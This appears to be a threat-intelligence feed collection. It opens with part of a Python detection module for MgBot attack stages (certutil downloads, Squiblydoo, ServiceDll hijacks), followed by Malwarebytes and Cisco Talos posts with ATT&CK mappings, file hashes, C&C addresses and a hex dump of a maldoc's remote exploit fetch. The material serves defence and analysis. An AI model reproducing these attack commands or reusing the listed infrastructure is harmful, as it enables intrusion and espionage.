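    {"event": "registry_set", "image": r"C:\Users\victim\Documents\ff.exe",
     "target_object": r"HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll",
     "details": r"C:\ProgramData\Microsoft\PlayReady\pMsrvd.dll"},
    {"event": "process_create", "image": r"C:\Windows\System32\net.exe",
     "parent_image": r"C:\Users\victim\Documents\ff.exe",
     "command_line": "net start AppMgmt"},
    # Benign noise: an administrator restarting the same service from cmd.exe.
    {"event": "process_create", "image": r"C:\Windows\System32\net.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "net start AppMgmt"},
]

ABUSED_SERVICES = ("appmgmt", "stisvc")  # the two services named in the analysis


def _cmd(e: Event) -> str:
    return e.get("command_line", "").lower()


def _img(e: Event) -> str:
    return e.get("image", "").lower()


def _in_windows_dir(path: str) -> bool:
    """True for paths under the Windows directory (literal or via %SystemRoot%)."""
    p = path.lower()
    return p.startswith("c:\\windows\\") or p.startswith("%systemroot%\\")


def certutil_download(e: Event) -> bool:
    """certutil used as a downloader: -urlcache together with -f (force fetch)."""
    return (e["event"] == "process_create" and _img(e).endswith("\\certutil.exe")
            and "-urlcache" in _cmd(e) and "-f" in _cmd(e).split())


def squiblydoo(e: Event) -> bool:
    """regsvr32 loading scrobj.dll with a scriptlet (.sct) as its /i: argument."""
    return (e["event"] == "process_create" and _img(e).endswith("\\regsvr32.exe")
            and "scrobj.dll" in _cmd(e) and ".sct" in _cmd(e))


def expand_to_playready(e: Event) -> bool:
    """expand.exe or extrac32.exe unpacking into the PlayReady directory under ProgramData."""
    return (e["event"] == "process_create"
            and (_img(e).endswith("\\expand.exe") or _img(e).endswith("\\extrac32.exe"))
            and "\\programdata\\microsoft\\playready\\" in _cmd(e))


def servicedll_hijack(e: Event) -> bool:
    """ServiceDll of AppMgmt or StiSvc repointed to a DLL outside the Windows directory."""
    if e["event"] != "registry_set":
        return False
    key = e.get("target_object", "").lower()
    hit = re.search(r"\\services\\(appmgmt|stisvc)\\parameters\\servicedll$", key)
    return bool(hit) and not _in_windows_dir(e.get("details", ""))


def suspicious_net_start(e: Event) -> bool:
    """'net start' of an abused service launched by a parent outside the Windows directory."""
    parts = _cmd(e).split()
    return (e["event"] == "process_create" and _img(e).endswith("\\net.exe")
            and len(parts) == 3 and parts[:2] == ["net", "start"]
            and parts[2] in ABUSED_SERVICES
            and not _in_windows_dir(e.get("parent_image", "")))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("certutil_download", certutil_download), ("squiblydoo", squiblydoo),
    ("expand_to_playready", expand_to_playready), ("servicedll_hijack", servicedll_hijack),
    ("suspicious_net_start", suspicious_net_start),
]


def detect(events: Iterable[Event]) -> Dict[str, List[int]]:
    """Map each rule that fired to the indexes of the events it matched."""
    hits: Dict[str, List[int]] = {}
    for i, e in enumerate(events):
        for name, rule in RULES:
            if rule(e):
                hits.setdefault(name, []).append(i)
    return hits


def chain_stages(events: List[Event]) -> int:
    """Distinct stages of the chain observed; three or more is a strong MgBot signal."""
    return len(detect(events))
```

Running `detect(SAMPLE_EVENTS)` flags events 0 to 4, one per rule, and leaves the administrator's `net start` (event 5) alone because its parent is under the Windows directory.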
Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.

[Figure 29: Malwarebytes Nebula blocking malicious Word document](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/nebula_.png>)

### MITRE ATT&CK techniques

**Tactic** | **ID** | **Name** | **Details**
---|---|---|---
Execution | [T1059](<https://attack.mitre.org/techniques/T1059>) | Command-Line Interface | Starts CMD.EXE for command execution
Execution | [T1106](<https://attack.mitre.org/techniques/T1106>) | Execution through Module Load | Loads dropped or rewritten executable: WUAUCTL.EXE, svchost.exe, rundll32.exe
Execution | [T1053](<https://attack.mitre.org/techniques/T1053>) | Rundll32 | Uses RUNDLL32.EXE to load library
Execution | [T1064](<https://attack.mitre.org/techniques/T1064>) | Scripting | WScript.exe: Starts MSHTA.EXE for opening HTA or HTML files
Execution | [T1035](<https://attack.mitre.org/techniques/T1035>) | Service Execution | Starts NET.EXE for service management
Execution | [T1170](<https://attack.mitre.org/techniques/T1170>) | Mshta | Starts MSHTA.EXE for opening HTA or HTML files
Execution | [T1086](<https://attack.mitre.org/techniques/T1086>) | PowerShell | Executes PowerShell scripts
Privilege Escalation | [T1050](<https://attack.mitre.org/techniques/T1050>) | New Service | Creates or modifies Windows services through rundll32.exe
Privilege Escalation | [T1088](<https://attack.mitre.org/techniques/T1088>) | Bypass UAC | Known privilege escalation attack through DllHost.exe
Persistence | [T1031](<https://attack.mitre.org/techniques/T1031>) | Modify Existing Service | Creates or modifies Windows services through rundll32.exe
Persistence | [T1050](<https://attack.mitre.org/techniques/T1050>) | New Service | Creates or modifies Windows services through rundll32.exe
Defense Evasion | [T1107](<https://attack.mitre.org/techniques/T1107>) | File Deletion | Starts CMD.EXE for self-deleting
Defense Evasion | [T1085](<https://attack.mitre.org/techniques/T1085>) | Rundll32 | Uses RUNDLL32.EXE to load library
Defense Evasion | [T1088](<https://attack.mitre.org/techniques/T1088>) | Bypass UAC | Known privilege escalation attack through DllHost.exe
Defense Evasion | [T1497](<https://attack.mitre.org/techniques/T1497/>) | Virtualization/Sandbox Evasion | The loader uses several anti-virtualization detection techniques
Defense Evasion | [T1221](<https://attack.mitre.org/techniques/T1221/>) | Template Injection | Maldoc uses template injection to download remote template
Defense Evasion | [T1218](<https://attack.mitre.org/techniques/T1218/>) | Signed Binary Proxy Execution | Uses Squiblydoo to load executable
Discovery | [T1012](<https://attack.mitre.org/techniques/T1012>) | Query Registry | Reads the machine GUID from the registry
Discovery | [T1082](<https://attack.mitre.org/techniques/T1082>) | System Information Discovery | Reads the machine GUID from the registry
Discovery | [T1007](<https://attack.mitre.org/techniques/T1007>) | System Service Discovery | Starts NET.EXE for service management
Lateral Movement | [T1105](<https://attack.mitre.org/techniques/T1105>) | Remote File Copy | certutil.exe: Downloads executable files from the Internet; cmd.exe: Starts CertUtil for downloading files
C&C | [T1105](<https://attack.mitre.org/techniques/T1105>) | Remote File Copy | certutil.exe: Downloads executable files from the Internet; cmd.exe: Starts CertUtil for downloading files

Table 1: MITRE ATT&CK TTPs

### IOCs

**2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a** Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx

**fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc** BNOHK.docx.zip

**3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790** Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar

**ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03** Email security check.rar

**1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6** Email security check.docx

**3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b** ADIN.docx (storm.sct)

**855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8** ADIN.docx (storm.sct)

**1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585** ff.exe (storm.txt)

**99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a** Cobalt Strike

**flash.governmentmm.com**: This domain was used by the actor to host remote templates. It was registered three months ago by someone in the United States.

**MgBot samples**

**45.77.245[.]0:** This IP has been used by Cobalt Strike as a C&C server.
\n\n**42.99.116[.]225**: C&C server used by final Payload.\n\n**Android samples**\n\nb5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77 \n9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846 \n5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46\n\nThe post [Chinese APT group targets India and Hong Kong using new variant of MgBot malware](<https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2020-07-21T15:00:00", "type": "malwarebytes", "title": "Chinese APT group targets India and Hong Kong using new variant of MgBot malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2018-8174"], "modified": "2020-07-21T15:00:00", "id": "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. 
and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisory's executive summary reads:

> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.

### Remarkable mentions in the cybersecurity advisory

Released alongside the advisory is the US Government's formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.

Mentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.

### Vulnerabilities

NSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

The advisory lists the following CVEs:

 * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)
 * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)
 * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)
 * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)
 * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)

We have added a link to the vendors' sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see, most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.

### General mitigation strategy

While some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:

 * Keep systems and products updated and patch as soon as possible after patches are released, since many actors exploit numerous vulnerabilities.
 * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.
 * Disable external management capabilities and set up an out-of-band management network.
 * Block obsolete or unused protocols at the network edge and disable them in device configurations.
 * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.
 * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.
 * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach's full scope before remediating.

### Techniques

The techniques leveraged by SVR actors include:

 * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.
 * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RDP) allow users to connect to internal enterprise network resources from external locations.
 * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.
 * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.
 * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.
 * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.

The items listed under mitigations and techniques probably won't be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.

Stay safe, everyone!

The post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

**Atomic research institute breached via VPN vulnerability** (Malwarebytes Labs, published 2021-06-21)

Remember when we told you to patch your VPNs already?
I hate to say "I told you so", but I informed you thusly.

According to South Korean officials, a North Korean cyber-espionage group managed to infiltrate the network of South Korea's state-run nuclear research institute last month.

### The crime: time and place

Cybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI's internal network.

### The suspect: Kimsuky

Some of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.

North Korean cyber-attacks on its southern neighbor are not uncommon, and Kimsuky is the APT best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.

### The victim: KAERI

KAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields—notably nuclear weapons—it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>), one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.

### The weapon: a VPN vulnerability

In a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers' IP addresses were blocked, and its system upgraded, when it found out about the attack on May 31.

The name of the VPN vendor is being kept secret. Although we can't rule out a zero-day, the fact that this wasn't mentioned, and that the system was updated in response, suggests it wasn't one. It certainly doesn't need to be, as there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, applying them has taken some organizations quite some time.

We also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.

The NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with the year the CVE was issued. What's most striking about the NSA's list is just how old most of the vulnerabilities on it are.

 * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN
 * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite
 * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN
 * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway
 * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access

As you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group like Kimsuky will have fewer problems reverse-engineering patches than your everyday cybercriminal.

### Patching or lack thereof

The risky strategy of little-to-no patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they'd experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.

Stay safe, everyone!

The post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

**Internet Explorer zero-day: browser is once again under attack** (Malwarebytes Labs, published 2018-05-10)

**Update (2018-05-25)**: CVE-2018-8174 has been added to the RIG exploit kit ([MDNC](<https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html>)).

**Update (2018-05-22)**: Security researcher [Richard Warren](<https://twitter.com/buffaloverflow>) [mentioned](<https://twitter.com/buffaloverflow/status/998604384937369601?s=11>) that a fully working IE zero-day (now patched) with payload was [uploaded to VirusTotal](<https://www.virustotal.com/#/file/86b2dec818edaca2b1794c9b3aed19139437fb007c0784bbc04822bca5ea1d39/details>). We decided to test Malwarebytes against it, since last time we only had a Proof of Concept on our hands. To illustrate in how many different ways we can block this exploit, we turned off several layers of the anti-exploit protection module (not recommended, only for testing purposes). You can see the results in the animation below:

--

In late April, two security companies ([Qihoo360](<http://blogs.360.cn/blog/cve-2018-8174-en/>) and [Kaspersky](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)) independently discovered a zero-day for Internet Explorer ([CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>)), which was used in targeted attacks for espionage purposes. This marks two years since a zero-day was last found ([CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>) being the previous one) in the browser that won't die, despite efforts from Microsoft to move on to the more modern Edge.

The vulnerability exists in the VBScript engine and how it handles memory objects.
It also affects IE11, even though VBScript is [no longer supported](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/dn384057(v=vs.85)>) there, because the compatibility tag for IE10 can be used.

The attack came via a Word document making use of [OLE autolink objects](<https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/>) to retrieve the exploit and shellcode from a remote server. However, it is important to note that it could very well have been executed by visiting a website instead.

Perhaps one of the reasons why it was not used as a drive-by download attack may be that Internet Explorer is no longer the default browser for most people, and therefore the exploitation would never occur. However, by tricking their victims into opening an Office document, the attackers can force Internet Explorer to load, thanks in part to the [URL moniker](<https://www.kb.cert.org/vuls/id/921560>) "feature."

Using [rtfdump.py](<https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py>), we see the call for an HTTP connection:

_**python rtfdump.py -s 320 -H CVE-2018-8174.rtf**_

    000014C0: 70 B2 86 8C 53 30 05 43 00 38 30 01 18 68 00 74 p...S0.C.80..h.t
    000014D0: 00 74 00 70 00 3A 00 2F 00 2F 00 61 00 75 00 74 .t.p.:././.a.u.t
    000014E0: 00 6F 00 73 00 6F 00 75 00 6E 00 64 00 63 00 68 .o.s.o.u.n.d.c.h
    000014F0: 00 65 00 63 00 6B 00 65 00 72 00 73 00 2E 00 63 .e.c.k.e.r.s...c
    00001500: 00 6F 00 6D 00 2F 00 73 00 32 00 2F 00 73 00 65 .o.m./.s.2./.s.e
    00001510: 00 61 00 72 00 63 00 68 00 2E 00 70 00 68 00 70 .a.r.c.h...p.h.p
    00001520: 00 3F 00 77 00 68 00 6F 00 3D 00 37 00 00 00 00 .?.w.h.o.=.7....

This remote request will download a VBS script. A [Proof of Concept adapted](<https://pastebin.com/Be3xFBBn>) from the [blog](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) published by Kaspersky can be seen below:

The flaw abused by this vulnerability relates to a reference count that is checked at the beginning of the function but not after, despite the chance of it being incremented along the way. This allows an attacker to execute malicious shellcode and eventually load the malware binary of their choice.

We tested this Use After Free (UAF) vulnerability with the publicly available PoC running Internet Explorer 11 under Windows 10. The browser crashes once it loads the VBS code, but with [Malwarebytes](<https://www.malwarebytes.com/>), the attack vector is mitigated:

Microsoft has released a [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174>) for this vulnerability, and we strongly advise applying it, as it is just a matter of time before other threat actors start leveraging this new opportunity in spam or exploit kit campaigns.

We will update this blog if we obtain more information about this vulnerability being used widely, and in particular, if a full working exploit is available.

The post [Internet Explorer zero-day: browser is once again under attack](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

**Cisco Talos blog post**

### Introduction

Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations.

Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis.
\n \n \nOther researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the [arrest of its alleged leader](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) in Spain this year. \n \nSimple campaigns typically use a single technique and often embed the final executable payload into the exploit document. However, more complex campaigns require meticulous planning on the part of the attacker and include more sophisticated techniques to hide the presence of the malicious code, evade operating system protection mechanisms and eventually deliver the final payload, likely to be present only in the memory of the infected computer and not as a file on the disk. \n \nThe attacks we will be highlighting generally start with an email campaign, often targeted toward financial institutions. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. \n \nThe emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright. They are using Word OLE compound documents with malicious obfuscated VBA macro code, RTF documents containing Microsoft Office exploits or PDF documents that start the next attack stages to eventually deliver a Cobalt Strike beacon binary or a JScript-based backdoor payload. \n \nIt is essential to be aware of these attacks as emails look legitimate, but can result in the installation of a payload that can inflict significant financial damage to the targeted organization. \n \n\n\n### Infection vector \u2014 Emails\n\n \nAll observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. 
\n \nThe text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. \n \nBelow are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174>). The final payload is a JScript backdoor also known as [More_eggs](<https://www.bleepingcomputer.com/news/security/a-hacking-group-is-already-exploiting-the-office-equation-editor-bug/>) that allows the attacker to control the affected system remotely. \n \n[](<https://2.bp.blogspot.com/-WZrxyxdxJK8/W179NLzmb-I/AAAAAAAAAJc/v49_XOG8JGwiA3Yzxbr9TFkjhACWCGxJACLcBGAs/s1600/image5.png>) \n\n\nObserved email campaign 1\n\n \nThe second campaign, sent on June 19, appears to be sharing threat intelligence information with the recipient, and the sender seems to be from a newly registered domain that looks like a domain belonging to a major manufacturer of ATMs and other payment systems. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. \n \n[](<https://4.bp.blogspot.com/-BfQowt5tM-A/W179Y_LBf4I/AAAAAAAAAJg/go6Wy_T0pjE6NDk_KY7eS3KyFrU5DaJDgCLcBGAs/s1600/image21.png>) \n\n\nObserved email campaign 2\n\n \nThe third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. 
The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. \n \n[](<https://4.bp.blogspot.com/-tCGYTSUl5uE/W179gupymPI/AAAAAAAAAJo/-LUCOwM2Nn0j_KZTYdL_EsWdOjMNCLGrACLcBGAs/s1600/image20.png>) \n\n\nObserved email campaign 3\n\n \n\n\n### Stage 1\n\n \n\n\n#### Document attacks (PDFs, RTFs, DOCs)\n\n \nMost commonly, the observed emails have a malicious RTF file as an attachment, but the attachments can also be Word documents with obfuscated VBA macro code, PDF files that redirect to other documents, or even outright binary executable payloads. \n \nHere, we show an example of a PDF campaign as seen from the point of view of the affected user. The user receives an email with a PDF attachment and opens a file that does not contain any exploit code, but relies on the social engineering techniques used in the email, which should convince the user to open the attachment without suspecting that there may be something wrong with it. \n \n[](<https://4.bp.blogspot.com/-mJZZirJV2G4/W179qMc6W4I/AAAAAAAAAJw/ZiZCPCiXPtIzqdco5ZNiUzria6y5pfXPgCLcBGAs/s1600/image10.png>) \n\n\nThis malicious PDF only contains a URL to entice the user to view the file.\n\n \nIf the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. 
[](<https://3.bp.blogspot.com/-CSBee5YMBZA/W179wJhZKeI/AAAAAAAAAJ0/oCN7dfQgw-cAQK3yQ8EZ6kab8jL3tG49ACLcBGAs/s1600/image2.png>)

Browser redirection

Finally, the malicious Word document is opened and the VBA macro code runs once the user enables editing of the content in Word. This kicks off the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to disk by one of the previous stages.

[](<https://2.bp.blogspot.com/-E2ABQdUTw_0/W1793OHj0gI/AAAAAAAAAJ8/WUap2R_rvFQaYJPsTf3cYF6cC_7bMC7yQCLcBGAs/s1600/image15.png>)

Malicious Word document

The decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit, so it cannot be relied upon for attribution.

[](<https://2.bp.blogspot.com/-_9NXN6xYfAw/W17-CInf82I/AAAAAAAAAKI/M3tBYyGnYBwe_NowkyHyriQsxVdElutDQCLcBGAs/s1600/image6.png>)

Decoy document opened in Word

#### Stage 2 — Exploits and exploit kits

RTF documents sent in the observed campaigns contain exploits for several vulnerabilities in Microsoft Office, and they seem to have been created using a version of an exploit toolkit often referred to as [Threadkit](<https://www.scmagazine.com/evolving-exploit-builder-kit-threadkit-used-for-rat-and-banking-trojan-campaigns/article/755975/>). Documents generated by the toolkit typically launch a couple of batch files, task.bat and task (2).bat, that drive the rest of the infection process.

Threadkit is not used exclusively by the actors behind the observed attacks; other groups use it to deliver various payloads, including Trickbot, Lokibot, SmokeLoader and other banking malware.

The actors behind the attacks seem to use a somewhat modified version of the exploit kit, one that launches code through known techniques for evading the Windows AppLocker protection feature by leveraging legitimate Microsoft applications such as cmstp, regsvr32 or msxsl. We will discuss these mechanisms in more detail later in this post.

At least three vulnerabilities are exploited with these documents. The most common is a stack buffer overflow in Microsoft Equation Editor (CVE-2017-11882), patched by Microsoft in November 2017, followed by a composite moniker vulnerability (CVE-2017-8570) and the very similar, but slightly older, script moniker vulnerability that is very popular among attackers (CVE-2017-0199).

